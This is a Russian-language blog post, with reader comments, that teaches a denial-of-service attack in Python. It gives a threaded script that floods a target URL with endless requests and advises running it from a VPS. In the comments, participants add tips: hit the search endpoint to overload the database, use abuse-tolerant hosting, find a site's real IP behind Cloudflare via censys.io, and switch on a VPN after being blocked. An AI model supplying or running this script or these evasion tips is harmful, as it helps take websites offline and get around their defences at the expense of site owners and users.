DOS атака при помощи Python

Для атак вида "DOS" используют один мощный сервер который посылает жертве столько запросов, что жертва не успевает обработать их и выдаёт ошибку 503 либо 504.

Для атаки нужна многопоточность, то есть нужно чтобы скрипт отправлял запрос не ожидая завершения предыдущего. В Python для этого есть библиотека "therading".

Пример простейшего скрипта для доса:

# coding: utf8
import threading
import requests
def dos():
 while True:
  requests.get("http://example.com")
  
while True:
 threading.Thread(target=dos).start()

Скрипт рекомендую запускать только на мощных компьютерах а ещё лучше на VPS сервере. Вот наш скрипт в действии:

Так же советую попробовать новый ддос скрипт который использует вместо потоков асинхронный код

Комментарии

  1. здравствуйте у меня вопрос откуда мне установить(взять) библиотеку threading подскажите пожалуйста

    ОтветитьУдалить
    Ответы
    1. Пишите в терминале pip install threaded

      Удалить
    2. Она встроена в питон, её устанавливать ненужно!

      Удалить
    3. Аахаххахахахаха «где мне установить библиотеку»

      Удалить
    4. Библиотека уже встроена в Python, потому вы можете сразу импортировать её без установки

      Удалить
  2. хм странно я установил threading и почему то мне пишет RuntimeError: can't start new thread
    Exception in thread Thread-186:

    ОтветитьУдалить
    Ответы
    1. Это нормально, просто скрипт создаёт в бесконечном цикле потоки и все уже упирается в процессор/память/ограничение ОС итд.

      Удалить
  3. Если у меня компьютер 64 битный, его можно назвать мощным?

    ОтветитьУдалить
  4. Данная атака производится с одного пк, и положить сайт таким образом практически невозможно (сайты сделанные на коленке и установленные на дешёвый хостинг во внимание не берём). Вы просто себе забьёте канал, и ваш же провайдер пошлёт вас далеко-далеко

    ОтветитьУдалить
    Ответы
    1. Вообще да, этот скрипт не совсем подходит для дудоса серьёзных сайтов. Но можно вместо while True: использовать например for _ in range(50): и тогда потоки не будут создаватся бесконечно.

      Дудосы обычно делают с абузо устойчивых VPS, провайдерам которых на все всеравно.

      Атаковать надо не просто сам корень сайта / а найти например get запрос на форму поиска и аттаковать поиск, тк запрос поиска требует много мощностей БД, то БД ляжет после пары запросов, и остальной сайт будет неработать.

      Удалить
  5. вопрос если я буду атаковать на защищенный от ддос атак сайт ничего сайту не будет?

    ОтветитьУдалить
    Ответы
    1. Да, cloudflare например отфильтрует и заблокирует ваш IP. Чтобы атака нормально прошла в таком случае, нужно еще найти оригинальный IP через censys.io например, и атаковать его.

      Удалить
    2. Стойте а что будет если заблокируют ip адрес
      что я не смогу заходить на сайт?
      Или для моего ip адреса атаковать будет недоступно?

      Удалить
    3. Да, заблокируют ваш IP и на сайт заходить не сможете. Но просто включите VPN например и можно будет дальше пользоваться.

      Удалить
  6. ряльно мощная штука)

    ОтветитьУдалить

  7. мне приходят сообщения по типу "norton заблокировал атаку:Web Attack:Malicious Domains Request 3." что делать помогите как убрать !!!!!!!!

    ОтветитьУдалить
  8. Слушайте я зашёл на pythonanywere.com и ввёл скрипт в новом файле и уменя консоль показала вот это:
    _start_new_thread(self._bootstrap, ())
    RuntimeError: can't start new thread

    ОтветитьУдалить
    Ответы
    1. Сервис чтобы не нагружать сеть может отрубить скрипты (repl.it делает то же только лимиты там меньше кусают)

      Удалить
  9. Здраствуйте,подскажите пожалуйста что делать если Python пишет "Invalid Syntax"?

    ОтветитьУдалить
    Ответы
    1. Надо понять на какой строчке этот инвалид синтаксис и почему он появился.

      Удалить
    2. Марат ору, кхуенно

      Удалить
  10. Люди помогите, пишет под import requests ошибку
    Import "requests" could not be resolved from sourcePylancereportMissingModuleSource
    подчеркивает желтым

    ОтветитьУдалить
    Ответы
    1. еще это при запуске - Возникло исключение: ModuleNotFoundError
      No module named 'requests'

      Удалить
    2. Библиотека вообще установлена? Проверьте командой pip freeze.

      Удалить
  11. Подскажите пожалуйста, как шифровать посылаемый "мусор" ?

    ОтветитьУдалить
  12. Подскажите пожалуйста, как шифровать посылаемый "мусор" ?

    ОтветитьУдалить
  13. хотел спросить что сделать если я использую visual studio code и что будет если я захочу завершить процесс что мне сделать? и еще что будет с ноутом если я запущу этот ддос мой ноут не взорвется? 8гб оперативы ,190гб место есть

    ОтветитьУдалить
  14. А ддос работает?

    ОтветитьУдалить

Отправить комментарий

Популярные сообщения из этого блога

Ведем телеграм канал через питон

Django migrations не видит изменения моделей